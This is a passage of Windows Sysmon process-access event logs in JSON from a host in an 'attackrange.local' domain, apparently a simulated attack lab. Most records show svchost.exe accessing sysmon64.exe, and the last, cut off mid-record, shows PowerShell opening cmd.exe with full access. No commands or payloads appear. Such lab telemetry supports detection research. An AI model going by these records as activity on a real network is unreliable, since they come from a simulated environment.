C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010BE2D0900}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: 